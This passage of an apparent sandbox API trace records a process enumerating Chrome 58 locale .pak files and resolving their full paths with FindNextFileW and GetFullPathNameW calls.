lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff03ddea, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x3e2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="ms.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff069d1c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x487e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff08c00a, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4d450, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl.pak", cAlternateFileName="")) returned 1 [0114.286] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0b7f3c, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x500e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff0e3e6e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4e63d, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff10fda0, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4f596, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff13208e, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x51b03, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff162de2, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x7e47b, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff18ed14, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5402d, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk.pak", cAlternateFileName="")) returned 1 [0114.287] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff1b1002, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4bb7e, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl.pak", cAlternateFileName="")) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d849d60, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d849d60, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff1d8112, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x79e3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr.pak", cAlternateFileName="")) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff206755, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x496bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv.pak", cAlternateFileName="")) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff22d865, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x44b74, dwReserved0=0x0, dwReserved1=0x0, cFileName="sw.pak", cAlternateFileName="")) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff25bea8, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xbcd4e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ta.pak", cAlternateFileName="")) returned 1 [0114.288] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff298f51, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0xb0b7d, dwReserved0=0x0, dwReserved1=0x0, cFileName="te.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff2c4e83, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x9efb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="th.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff2f0db5, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4f508, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff31cce7, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x7e1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff343df7, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x5af42, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff3687f6, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x4217c, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d86fec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7d86fec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xff394728, ftLastWriteTime.dwHighDateTime=0x1d2c8a2, nFileSizeHigh=0x0, nFileSizeLow=0x42194, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW.pak", cAlternateFileName="")) returned 1 [0114.289] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.289] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0114.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0114.290] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0114.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\am.pak", lpFilePart=0x0) returned 0x4d [0114.290] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bg.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\bn.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ca.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\cs.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\de.pak", lpFilePart=0x0) returned 0x4d [0114.291] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-GB.pak", lpFilePart=0x0) returned 0x50 [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak", lpFilePart=0x0) returned 0x50 [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak", lpFilePart=0x0) returned 0x51 [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\et.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak", lpFilePart=0x0) returned 0x4e [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fr.pak", lpFilePart=0x0) returned 0x4d [0114.292] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\gu.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\he.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hr.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hu.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\it.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ja.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ko.pak", lpFilePart=0x0) returned 0x4d [0114.293] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lt.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\lv.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ml.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\mr.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ms.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nb.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\nl.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pl.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-BR.pak", lpFilePart=0x0) returned 0x50 [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\pt-PT.pak", lpFilePart=0x0) returned 0x50 [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ro.pak", lpFilePart=0x0) returned 0x4d [0114.294] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ru.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sk.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\sl.pak", lpFilePart=0x0) returned 0x4d [0114.295] GetFullPathNameW (in: lpFileName="C:\\Program Files 